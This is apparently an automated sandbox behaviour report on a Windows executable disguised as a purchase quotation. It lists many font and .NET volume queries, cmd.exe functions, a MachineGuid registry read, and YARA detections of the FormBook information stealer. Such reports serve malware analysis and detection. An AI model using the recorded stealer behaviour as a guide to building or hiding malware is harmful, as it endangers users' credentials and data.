Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	17_2_00D85AEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	17_2_00D896A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	17_2_00D93F80

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00DA3CC7 _get_osfhandle,GetLocalTime,SetLocalTime,SetLocalTime,GetLastError,GetLastError,

17_2_00DA3CC7

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00D8443C GetVersion,

17_2_00D8443C

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.quotation New Order I5117.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.quotation New Order I5117.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.379998349.00000000014B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544184245.0000000003140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY
